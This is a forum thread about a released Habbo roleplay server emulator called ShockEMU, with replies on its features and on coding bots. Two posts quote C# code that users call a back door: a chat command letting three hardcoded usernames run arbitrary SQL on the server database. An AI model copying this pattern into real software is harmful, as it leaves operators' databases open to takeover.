[RELEASE] ShockEMU V1 (RP)

Jerry

not rly active lol
Jul 8, 2013
Hey,
Decided to release RetroRP's stuff.
Shock EMU V1, has Gun manager, Cars, Nice CMS, Police bots, RP Commands, Good timers, Cached, Stable, Robbing, Giving money with 30 minute delay, decided to remove Missions, Minigames, and Node as I don't think you deserve that but here you go..
Not that much stuff added but enjoy!!
Download Link:
Live View:

Sorry, but didn't had tested this out so no screenshots for the moment..

Credits:
Jake Cooper - Adding a few bits n bobs
Jake Retros (Kieran Alt w.e) - ShockEMU/Server
I don't give myself credits because I have nothing to do with this emulator, just releasing this source. Enjoy! Like + Rate!!

13rad

King
Sep 15, 2013
Nothing special.
There is something special in this emu a back door.
Code:
  //DANGEROUS
                #region RunQuery <query>
                case "runquery":
                case "query":
                    {
                        if (Session.GetHabbo().Username == "Jake" || Session.GetHabbo().Username == "Matt" || Session.GetHabbo().Username == "Joel")
                        {
                            using (IQueryAdapter adapter = ButterflyEnvironment.GetDatabaseManager().getQueryreactor())
                            {
                                string message = Input.Replace(Params[0].ToLower(), "");
                                adapter.runFastQuery(message);
                            }
                        }
                        else
                        {
                            return true;
                        }
                        return true;
                    }
                #endregion 
                 //AREA 51 KEEP AWAY

Jerry

not rly active lol
Jul 8, 2013
The developer said that he made that command for security purposes like to run a query for room making so he won't reboot emulator everytime for something.

Rogify

Dec 15, 2013
The CMS is fucked, you need to do CSS, to fix the images. Awesome Emulator, tho, one of the best ever released. 10/10

Joel

Aspiring Developer
Mar 30, 2014
There is something special in this emu a back door.
Code:
  //DANGEROUS
                #region RunQuery <query>
                case "runquery":
                case "query":
                    {
                        if (Session.GetHabbo().Username == "Jake" || Session.GetHabbo().Username == "Matt" || Session.GetHabbo().Username == "Joel")
                        {
                            using (IQueryAdapter adapter = ButterflyEnvironment.GetDatabaseManager().getQueryreactor())
                            {
                                string message = Input.Replace(Params[0].ToLower(), "");
                                adapter.runFastQuery(message);
                            }
                        }
                        else
                        {
                            return true;
                        }
                        return true;
                    }
                #endregion
                 //AREA 51 KEEP AWAY

This was for me, Jake, and Matt to be able to run queries from inside the hotel instead of having to restart the emulator for mysql changes. The reasons it has our names is because this was never intended to be released although one day Jake seeked no further development on it and decided to release it without a couple of extra things due to people claiming that they made them. I believe only a select few have the full emulator. This is one of the best emulators you will get and find for a roleplay as of now, but please remember we didn't finish this and it lacks a good amount of features.

staw

Oct 30, 2012
Hi Jerry I might know the id jobs etc.
and that table or this is to add for example my character or another policeman
I Thank You!

Core

Nov 10, 2016
hey, can u give me police bot code? and ammu bot

The police bots where rushed in this emulator, so it's not worth copying it. You're better off just trying to coding them yourself.

Just make a class of the bots AI instance and then most of the code will be done inside of the ticker 'event'. Oh and, instead of constantly looping through the room users all the time, just add a OnRoomUserWanted 'event' and check if the user is wanted when they enter the room (OnRoomUserEntered, or something like that). Also, in the released build of Shock I don't think it has proper tile finding, so if user goes in corner of the room the bot will not follow them; simple solution is to get all the tiles around them and validate them; choosing the most valid one first (should order them in distance first so it doesn't walk to the tile behind the user :')).

As for ammo, it's as simple as the command. Just add a AI class for the bots AI instance and use OnRoomUserSay if it contains something specific like 'buy ammo' then update the ammo variable (if you don't cache then also update it in the db).

DeNapster

Oct 1, 2016
pm me? at facebook ; Mhd Tntwi
The police bots where rushed in this emulator, so it's not worth copying it. You're better off just trying to coding them yourself.

Just make a class of the bots AI instance and then most of the code will be done inside of the ticker 'event'. Oh and, instead of constantly looping through the room users all the time, just add a OnRoomUserWanted 'event' and check if the user is wanted when they enter the room (OnRoomUserEntered, or something like that). Also, in the released build of Shock I don't think it has proper tile finding, so if user goes in corner of the room the bot will not follow them; simple solution is to get all the tiles around them and validate them; choosing the most valid one first (should order them in distance first so it doesn't walk to the tile behind the user :')).

As for ammo, it's as simple as the command. Just add a AI class for the bots AI instance and use OnRoomUserSay if it contains something specific like 'buy ammo' then update the ammo variable (if you don't cache then also update it in the db).

Users who are viewing this thread